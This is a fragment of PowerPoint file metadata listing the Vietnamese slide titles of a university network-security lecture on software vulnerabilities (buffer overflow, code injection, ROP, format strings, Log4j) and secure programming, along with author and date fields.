      <vt:lpstr>Tràn bộ đệm – Ví dụ khác</vt:lpstr>
      <vt:lpstr>Tràn bộ đệm – Ví dụ khác</vt:lpstr>
      <vt:lpstr>Khai thác lỗ hổng tràn bộ đệm</vt:lpstr>
      <vt:lpstr>Code Injection – Cách khai thác</vt:lpstr>
      <vt:lpstr>Code Injection – Ví dụ</vt:lpstr>
      <vt:lpstr>Code Injection – Ví dụ</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Code Injection – Ví dụ</vt:lpstr>
      <vt:lpstr>Code Injection – Ví dụ</vt:lpstr>
      <vt:lpstr>Code Injection – Ví dụ</vt:lpstr>
      <vt:lpstr>Code Injection – Hệ quả</vt:lpstr>
      <vt:lpstr>Code Injection – Hệ quả</vt:lpstr>
      <vt:lpstr>Code Injection – Hệ quả</vt:lpstr>
      <vt:lpstr>Code Injection – Hệ quả</vt:lpstr>
      <vt:lpstr>Code Injection – Ví dụ</vt:lpstr>
      <vt:lpstr>Code Injection – Hệ quả</vt:lpstr>
      <vt:lpstr>Code Injection – Hệ quả</vt:lpstr>
      <vt:lpstr>Lỗ hổng khi truy cập vùng nhớ heap</vt:lpstr>
      <vt:lpstr>Heap overflow: C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>Buffer Overflow – Phòng chống</vt:lpstr>
      <vt:lpstr>Sử dụng giá trị canh giữ - Ví dụ </vt:lpstr>
      <vt:lpstr>Sử dụng giá trị canh giữ - Hạn chế</vt:lpstr>
      <vt:lpstr>Non-executable pages – Hạn chế</vt:lpstr>
      <vt:lpstr>Return-to-libc: Ví dụ</vt:lpstr>
      <vt:lpstr>Return-to-libc: Ví dụ</vt:lpstr>
      <vt:lpstr>Return-to-libc: Ví dụ</vt:lpstr>
      <vt:lpstr>Return-oriented programming (ROP)</vt:lpstr>
      <vt:lpstr>ROP – Ví dụ</vt:lpstr>
      <vt:lpstr>ROP – Ví dụ</vt:lpstr>
      <vt:lpstr>ROP – Ví dụ</vt:lpstr>
      <vt:lpstr>ROP – Ví dụ</vt:lpstr>
      <vt:lpstr>ROP – Ví dụ</vt:lpstr>
      <vt:lpstr>ROP – Ví dụ</vt:lpstr>
      <vt:lpstr>Buffer Overflow – Phòng chống</vt:lpstr>
      <vt:lpstr>Buffer Overflow – Phòng chống</vt:lpstr>
      <vt:lpstr>ASLR</vt:lpstr>
      <vt:lpstr>ASLR – Hạn chế</vt:lpstr>
      <vt:lpstr>Kết hợp các kỹ thuật phòng chống</vt:lpstr>
      <vt:lpstr>Kết hợp phòng chống: Apple iOS</vt:lpstr>
      <vt:lpstr>Kích hoạt phòng chống</vt:lpstr>
      <vt:lpstr>3. Một số lỗ hổng phần mềm khác</vt:lpstr>
      <vt:lpstr>Lỗ hổng xâu định dạng</vt:lpstr>
      <vt:lpstr>Lỗ hổng xâu định dạng: Ví dụ</vt:lpstr>
      <vt:lpstr>Lỗ hổng xâu định dạng</vt:lpstr>
      <vt:lpstr>Lỗ hổng xâu định dạng: Ghi đè</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn số nguyên</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn số nguyên – Ví dụ 1</vt:lpstr>
      <vt:lpstr>Lỗ hổng tràn số nguyên – Ví dụ 2</vt:lpstr>
      <vt:lpstr>Lỗ hổng serialization</vt:lpstr>
      <vt:lpstr>Lỗ hổng serialization: Log4j</vt:lpstr>
      <vt:lpstr>4. Lập trình an toàn</vt:lpstr>
      <vt:lpstr>Ngôn  ngữ không an toàn và an toàn</vt:lpstr>
      <vt:lpstr>“Giai thoại” về hiệu năng</vt:lpstr>
      <vt:lpstr>Lập trình an toàn</vt:lpstr>
      <vt:lpstr>An toàn truy cập bộ nhớ</vt:lpstr>
      <vt:lpstr>An toàn không gian – Ví dụ</vt:lpstr>
      <vt:lpstr>An toàn truy cập bộ nhớ</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Điều kiện truy cập bộ nhớ</vt:lpstr>
      <vt:lpstr>Điều kiện truy cập bộ nhớ - Ví dụ</vt:lpstr>
      <vt:lpstr>Các nguyên tắc lập trình an toàn</vt:lpstr>
      <vt:lpstr>Kiểm tra mọi dữ liệu đầu vào</vt:lpstr>
      <vt:lpstr>Sử dụng các hàm xử lý xâu an toàn</vt:lpstr>
      <vt:lpstr>Sử dụng con trỏ một cách an toàn</vt:lpstr>
      <vt:lpstr>Sử dụng các thư viện an toàn hơn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an toàn an ninh mạng</dc:title>
  <dc:creator>TungBT</dc:creator>
  <cp:lastModifiedBy>Bui Trong Tung</cp:lastModifiedBy>
  <cp:revision>2203</cp:revision>
  <cp:lastPrinted>2014-02-17T01:12:37Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-27T03:47:19Z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0x01010044C3CAAB23BA2B44AF89E56FA7008F5F</vt:lpwstr>
  </property>
</Properties>
</file>